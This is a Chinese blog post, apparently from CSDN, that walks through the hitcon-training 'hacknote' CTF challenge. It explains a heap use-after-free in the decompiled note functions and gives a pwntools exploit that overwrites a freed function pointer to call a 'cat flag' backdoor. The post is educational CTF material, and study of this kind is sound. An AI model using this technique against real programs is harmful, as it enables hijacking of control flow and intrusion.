堆利用 - Use After Free

最新推荐文章于 2024-04-26 20:05:58 发布
最新推荐文章于 2024-04-26 20:05:58 发布
阅读量953 收藏 2
点赞数 4
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yms0211/article/details/123674370
版权

堆利用 - Use After Free

概述:

Use after free ,直译过来就是在释放后再利用,那么是怎么在释放后再利用的呢?

其实这个释放后再利用主要是因为在程序中原本指向某些函数或堆块的指针在堆块被free或函数结束后指针本身确没有被置空,那么这个没有被置空的指针所在的堆块虽然被释放了,但是我们却还可以通过程序内对堆块内部的操作来执行这个指针指向的函数。

#以下的内容截取自CTF-wiki#

堆块被释放后一般有以下几种情况:

  • 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。
  • 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转
  • 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存进行了修改,那么当程序再次使用这块内存时,就很有可能会出现奇怪的问题

在wiki中有一个关于UAF的示例,结合源码就可以很清楚的看到UAF的利用过程,这篇文章主要是要写一道例题

例题:hitcon-training-hacknote

练习网址:https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/heap/use_after_free/hitcon-training-hacknote

静态分析:

add_note()函数:
unsigned int add_note()
{
  int v0; // ebx
  int i; // [esp+Ch] [ebp-1Ch]
  int size; // [esp+10h] [ebp-18h]
  char buf[8]; // [esp+14h] [ebp-14h] BYREF
  unsigned int v5; // [esp+1Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  if ( count <= 5 )
  {
    for ( i = 0; i <= 4; ++i )
    {
      if ( !*(&notelist + i) )
      {
        *(&notelist + i) = malloc(8u);
        if ( !*(&notelist + i) )
        {
          puts("Alloca Error");
          exit(-1);
        }
        *(_DWORD *)*(&notelist + i) = print_note_content;
        printf("Note size :");
        read(0, buf, 8u);
        size = atoi(buf);
        v0 = (int)*(&notelist + i);
        *(_DWORD *)(v0 + 4) = malloc(size);
        if ( !*((_DWORD *)*(&notelist + i) + 1) )
        {
          puts("Alloca Error");
          exit(-1);
        }
        printf("Content :");
        read(0, *((void **)*(&notelist + i) + 1), size);
        puts("Success !");
        ++count;
        return __readgsdword(0x14u) ^ v5;
      }
    }
  }
  else
  {
    puts("Full");
  }
  return __readgsdword(0x14u) ^ v5;
}

对应create功能,简单说一下这个函数的执行流程:首先这里有一个基址 &notelist(0x0804A070)程序是通过这个机制加上偏移来在某个地址上申请堆块。

函数开始时先创建了一个8字节的堆块,这是作为程序申请的chunk结构体指针,并在这个结构体之中的第一个位置上存放了一个函数指针:

 *(_DWORD *)*(&notelist + i) = print_note_content;

然后让用户自主输入一个数字来决定并申请content堆块,然后将这个指向这个内容堆块的指针存放在结构体堆块中的第二个位置上

*(_DWORD *)(v0 + 4) = malloc(size);

所以结构体堆块中存放的信息大概如下:

在这里插入图片描述

剩下的部分就是往申请的内容堆块里读入用户输入的数据,还有一点要注意的就是这个内容堆块的紧邻这结构体堆块的:

read(0, *((void **)*(&notelist + i) + 1), size);
del_note()函数:
unsigned int del_note()
{
  int v1; // [esp+4h] [ebp-14h]
  char buf[4]; // [esp+8h] [ebp-10h] BYREF
  unsigned int v3; // [esp+Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  printf("Index :");
  read(0, buf, 4u);
  v1 = atoi(buf);
  if ( v1 < 0 || v1 >= count )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *(&notelist + v1) )
  {
    free(*((void **)*(&notelist + v1) + 1));
    free(*(&notelist + v1));
    puts("Success");
  }
  return __readgsdword(0x14u) ^ v3;
}

对应delete功能,这一次的UAF漏洞就发生在这个函数之中,我们可以看见,在函数释放堆块之后,在结构体堆块中的函数指针等并没没有被置空,这就出现UAF漏洞

 if ( *(&notelist + v1) )
  {
    free(*((void **)*(&notelist + v1) + 1));
    free(*(&notelist + v1));
    puts("Success");
  }

也就是这里,在free掉结构体堆块和content堆块并没有将指针置空

print_note()函数:
unsigned int print_note()
{
  int v1; // [esp+4h] [ebp-14h]
  char buf[4]; // [esp+8h] [ebp-10h] BYREF
  unsigned int v3; // [esp+Ch] [ebp-Ch]

  v3 = __readgsdword(0x14u);
  printf("Index :");
  read(0, buf, 4u);
  v1 = atoi(buf);
  if ( v1 < 0 || v1 >= count )
  {
    puts("Out of bound!");
    _exit(0);
  }
  if ( *(&notelist + v1) )
    (*(void (__cdecl **)(_DWORD))*(&notelist + v1))(*(&notelist + v1));
  return __readgsdword(0x14u) ^ v3;
}

对应show功能,这个函数中最重要的就是这一行代码:

(*(void (__cdecl **)(_DWORD))*(&notelist + v1))(*(&notelist + v1));

这段代码的内容中出现了两个**&notelist + v1**,第一个是调用函数指针,开始执行这个地址上存放的函数指针对应的函数功能,第二个是为即将调用的打印函数传参

在在后面对漏洞的利用中我们再次调用函数就要用到这行代码的功能

print_note_content函数:

int __cdecl print_note_content(int a1)
{
  return puts(*(const char **)(a1 + 4));
}

功能就是打印传入参数地址 + 4位置上的内容(也就是对应的结构体堆块中的content指针指向的content堆块中的内容)

magic函数:

内存分析:

int magic()
{
  return system("cat flag");
}

很明显这是个后门函数,在后面我们会用到

我们进入gdb调试以后先随便创建两个堆块,然后联合heap指令看一下对应堆块中的内容:
在这里插入图片描述

这里可以看见我们创建的两个堆块的结构体堆块和对应的content堆块,进入这些堆块看一下:
在这里插入图片描述

这里由于我的gdb是以64位的形式来展现的,所以一行里其实是两个内容,看起来会有点别扭

可以看见我们的结构体堆块和content堆块是紧挨着的,然后我们释放掉这两个堆块再看一下:

在这里插入图片描述

这里可以看见虽然堆块内的内容被清空了,但是实现打印功能函数还在,那么我们就可以覆盖掉这个函数指针,将其替换成前面的那个后门函数就可以拿到flag了

思路整理:

1.创建两个堆块,content大小可以随意,但是不能小于8字节,不然会影响后面的利用

2.将创建好的两个堆块释放掉,由于fastbin的机制,这两个堆块对应的结构体堆块会进入fastbins中(两个的大小都为16字节)

3.我们在释放后如果马上再申请一个content大小为0x8的堆块,那么我们就会又需要两个0x16字节大小的堆块,此时存放在fastbins中的两个堆块就会被启用来分别作为这个最新申请的堆块的结构体和内容堆块那么我们就可以对重新启用的这两个堆块中的函数指针进行覆盖**

4.将重新启用作为content的那个堆块中的print_note_content函数指针覆盖为后面函数的地址,再选择print_note()函数的打印功能就可以执行这个后门函数了

EXP:

from pwn import *

context.log_level = 'debug'

io = process("./hacknote")
elf = ELF("./hacknote")

flag_addr = 0x0804898F

def create(size,content):
    io.recvuntil(":")
    io.sendline(b"1")
    io.recvuntil(":")
    io.sendline(bytes(str(size), encoding = 'utf-8'))
    io.recvuntil(":")
    io.send(content)
def delete(idx):
    io.recvuntil(":")
    io.sendline(b'2')
    io.recvuntil(":")
    io.sendline(bytes(str(idx), encoding = 'utf-8'))
def show(idx):
    io.recvuntil(":")
    io.sendline(b'3')
    io.recvuntil(":")
    io.sendline(bytes(str(idx), encoding = 'utf-8'))

create(0x20,b'aaaaa')
create(0x20,b'bbbbb')

delete(1)
delete(0)

payload = p32(flag_addr)

create(8,payload)

show(1)

io.interactive()

tips:

在利用时要注意我们释放堆块时的顺序,这里我们是先释放了1,然后是0,这样的话在fastbins的链表中先被取出使用的就是编号为0的堆块(作为结构体指针),编号为1的堆块作为content堆块,所以我们在后面再次调用打印功能是要选择编号为1的堆块

youngmith
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
eu-16-Wen-Use-After-Use-After-Free-Exploit-UAF-By-Generating
08-29
eu-16-Wen-Use-After-Use-After-Free-Exploit-UAF-By-Generating-Your-Own 安全开发 安全分析 安全体系 数据安全 安全架构
[03] HEVD 内核漏洞之UAF
abns44296的博客
07-24 342
作者:huity出处:https://www.cnblogs.com/huity35/p/11240997.html版权:本文版权归作者所有。文章在博客园、看雪、个人博客同时发布。转载:欢迎转载,但未经作者同意,必须保留此段声明;必须在文章中给出原文连接;否则必究法律责任。 0x00 前言 上一节研究了内核栈溢出相关问题,事实上利用已经成功了, 但是源码在vs环境下编译的驱动文件和...
Use After Free
仙某某的仙女
04-19 2369
use after free free之后的变量,该变量的内存处的内存指针还在指向该内存处,所以当我们下一次申请同样大小的变量时,可以申请到上一个变量的位置 使用gdb可视化观察 free() 观察 set disassembly-flavor intel set pagination off disassembly main info proc mapping 查看内存映射 deine hook-stop x/56wx 0x8..
use-after-free漏洞-hacknote
qq_43390703的博客
10-17 1098
hacknote 经典的use-after-free漏洞。 原理 简单的说,Use After Free 就是其字面所表达的意思,当一个内存块被释放之后再次被使用。但是其实这里有以下几种情况 内存块被释放后,其对应的指针被设置为 NULL , 然后再次使用,自然程序会崩溃。 内存块被释放后,其对应的指针没有被设置为 NULL ,然后在它下一次被使用之前,没有代码对这块内存块进行修改,那么程序很有可能可以正常运转。 内存块被释放后,其对应的指针没有被设置为 NULL,但是在它下一次使用之前,有代码对这块内存
好好说话之Use After Free
hollk’s blog
09-28 4605
到了Use After Free啦,总体来说这种手法并不复杂,特征也很明显,就是在静态分析阶段观察释放chunk之后指针是否置空。本以为参加hw会往后拖更,没想到这么快就写完了。如果前面一直跟着学的话这部分也应该难不到你,我会在接下来的Fastbin Attack等你,加油~
内存安全问题之 use-after-free 漏洞的介绍
SAP 资深技术专家 Jerry Wang 的技术分享
11-11 180
"Use-after-free"漏洞指的是在释放(free)了某块内存后,程序继续使用了已释放的内存区域,可能导致严重的安全问题。总的来说,"use-after-free"漏洞是一种严重的计算机安全威胁,因为它允许攻击者在内存释放后操纵已被标记为可用的内存,从而执行恶意代码。这样的情况下,如果程序继续访问已经释放的内存区域,就会出现"use-after-free"漏洞。随着对漏洞的研究和意识的增强,有许多工具和技术被开发出来来检测和修复"use-after-free"漏洞。
溢出漏洞之UAF--(Use After Free)
半岛铁盒的博客
06-02 898
具体原理 在释放内存后未将指向原内存的指针置为null,use after free的意思就是在释放以后进行use。当我们重新申请与之前释放掉的内存大小相同的块时,就会就先问题. 可以继续使用之前释放掉的那块内存。但是再次使用时,因为指针指向的内存包含的数据不是原来的数据了,此时的引用对于正常程序来说是有风险的; 这是个UAF的错误例子 ...
Use After Free (hacknote为例)
fzucaicai的博客
03-30 264
gcc hacknote.c -no-pie -o hacknote (自己编译下,关掉pie会更好)这题的思路无非就是利用free块后,对应指向该块的指针没有置空,仍然指向这一块内存,因此我们仍然可以使用这个指针去做某些事情,例如在这里的print_note函数,我们仍然可以利用未置空的指针去输出对应的内容,这也是一个造成内存泄露的点。在这里是存在一个后门函数的,就是magic函数,刚好就是system("cat falg"),这也非常明显了,我们就是要通过某种途径,让程序执行这个后门函数。
Linux x86 漏洞利用-Use-After-Free(UAF)-释放后可重用
z190814412的博客
01-08 4962
Use-After-Free 先决条件 Off-By-One漏洞(基于) 理解glibc malloc VM设置:Fedora 20(x86) 什么是释放后可重用(UaF)? 继续使用已经释放的内存指针称为use-after-free bug !! 此错误可能导致任意代码执行。 易受攻击的代码: #include &amp;lt;stdio.h&amp;gt; #include &amp;lt;string....
cloudcommerce-conpay-free_onemore_WordPress_http//free.1204free_
10-03
WordPress multi industry theme is a theme of multi industry preset architecture launched by us after comprehensive integration in 2019. We will continue to increase theme preset data in the future so ...
xcpclock_demo.zip_Free!_clock_desktop_my clock
09-23
After finishing my XAnalogClock article, I wanted free-floating clock to use on my desktop. XCPClock is implemented using SetLayeredWindowAttributes, which is available in Win 2000 and later.
php-7.3.6-nts-Win32-VC15-x64.zip
06-25
Fixed bug #77843 (Use after free with json serializer). Opcache: Fixed possible crashes, because of inconsistent PCRE cache and opcache SHM reset. PDO_MySQL: Fixed bug #77944 (Wrong meta pdo_type...
Universal-USB-Installer
02-14
patent must be licensed for everyone's free use or not licensed at all. The precise terms and conditions for copying, distribution and modification follow. GNU GENERAL PUBLIC LICENSE TERMS AND ...
安装SSL证书之后还会有不安全提示怎么办?
JoySSL230907的博客
04-20 816
在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。在这里,你可以申请到免费单域名证书、免费多域名证书以及免费通配符证书。- 证书链完整性:确保您不仅安装了主证书,还包含了所有必要的中间证书。缺少中间证书可能导致浏览器认为证书不可信。- 清除浏览器缓存:浏览器可能缓存了旧的或错误的证书信息,清除缓存有助于加载新安装的证书。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。永久免费SSL证书_永久免费https证书_永久免费ssl证书申请-JoySSL。
跨境电商测评攻略:如何安全有效地提升业绩?
zcwz888的博客
04-23 320
但自养号需要解决技术层面的问题,如果是买设备或者软件这种,可能上一秒还能用,下一秒就因为平台风控的原因批量封号,因为平台会通过ip 获取到设备的型号,地区码,监管码,主板码,WIFI地址,甚至是颜色,指纹码,IP地址等等大概几十个参数,参数关联后,触发平台机审,导致的砍单,封号。这时候要好好规划一下测评的事情,做美客多到最后你会发现,测评是最有效果的,因为测评的本质就是玩弄流量,模仿用户的真实行为让流量变得更多,从而得到跨境电商平台规则的加成,竞争激烈的产品不测评和别人竞争。
网络安全实训Day16
最新发布
Yisitelz的博客
04-26 249
网络空间安全第16天学习笔记。漏洞扫描;内网渗透
无需公网IP,安全稳定实现U8C异地访问
asdaddsd的博客
04-21 273
快解析内网穿透实现在任何地域、任何时间、任何网络环境,快速访问内网的各种应用。为了进一步保证企业访问的安全性,快解析域名不仅支持https协议、免开端口,同时在无忧版、钻石版、旗舰版、星耀版增加了访问白名单、访问密码功能,让企业数据更安全。快解析内网穿透经常运用在远程办公OA、数据库、搭建web网站、ERP、访问NAS、信息管理、文件共享FTP、软件跨网互通等各种场景。在财务、人力、供应链、采购、制造、营销、研发、项目、资产、协同等领域为客户提供数字化、智能化、社会化的企业云服务产品与解决方案。
heap-use-after-free
09-06
### 回答1: "heap-use-after-free" 是一种常见的内存错误,通常发生在程序试图在释放了一块内存后仍然引用该内存地址的情况下。 在使用分配的内存时,如果程序在释放内存后还引用该内存地址,就会导致 "heap-use-after-free" 错误。这可能会导致程序崩溃、数据损坏或安全漏洞。 为了避免 "heap-use-after-free" 错误,程序员应该确保在释放内存后不再使用该内存地址。可以通过将指向已释放内存的指针设置为 NULL 或使用内存分配器函数(如 malloc、calloc、realloc 等)来避免这种错误。另外,一些内存调试工具也可以检测这种错误并提供更多的信息来帮助程序员调试。 ### 回答2: heap-use-after-free是一种常见的相关漏洞,它在程序中利用了一个已经被释放的内存。当我们释放内存后,如果不小心继续使用已经释放的内存,就会导致heap-use-after-free漏洞。 当一个内存被释放后,它会返回给管理器,可以被重新分配给其他程序使用。然而,如果我们在释放内存后,仍然持有对该内存的指针,并且在后续的代码中使用了该指针,就会造成heap-use-after-free漏洞。 这种错误的使用已经释放的内存可能导致程序的不可预测行为,甚至可以被恶意攻击者利用来执行任意代码。攻击者可以通过控制已释放的内存中的数据来改变程序的执行流程或者读取敏感信息。 为了防止heap-use-after-free漏洞的发生,我们应该遵循一些最佳实践。首先,确保在不再使用内存之前将其正确释放。其次,及时将已经释放的指针设置为NULL,以避免误用。此外,使用管理器提供的专用函数来分配和释放内存,避免手动管理内存,可以减少这类错误的发生。 最后,漏洞修复是非常重要的。在发现了heap-use-after-free漏洞后,我们应该尽快修复它,以避免潜在的安全问题。修复这类漏洞的方法包括修改程序逻辑、改变内存分配和释放的顺序等。 综上所述,heap-use-after-free是一种常见的相关漏洞,它产生于程序中继续使用已经释放的内存。为了防止这类漏洞的发生,我们需要注意正确地分配和释放内存,并及时修复已发现的漏洞。 ### 回答3: heap-use-after-free是指在上释放了某个内存块,但之后仍然对该内存块进行了访问或操作。这种错误通常发生在程序员没有正确管理内存的情况下。 当释放完一个内存块之后,程序应该立即将指向该内存块的指针置为NULL,以防止错误地访问已经释放的内存块。然而,如果未将指针置为NULL,并继续使用该指针进行读取或写入操作,就会产生heap-use-after-free错误。 这种错误可能导致一些严重的后果。例如,可能会导致程序崩溃、数据损坏,甚至存在潜在的安全风险。因此,程序员在使用上分配的内存时,必须遵守正确的内存管理规则,包括正确释放内存并及时将指针置为NULL。 为了避免heap-use-after-free错误,程序员可以采取以下几种措施。首先,尽量使用动态内存分配的高级抽象机制,如智能指针或垃圾回收器,以自动管理内存。其次,当手动管理内存时,要确保正确释放内存并将指针置为NULL。另外,可以使用工具进行内存泄漏检测和动态分析,以及进行严格的代码审查和测试,以提前发现和修复heap-use-after-free错误。 总之,heap-use-after-free是一种内存管理错误,程序员必须小心处理以避免产生严重的后果。正确的内存管理和代码审查是预防这种错误的有效方法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值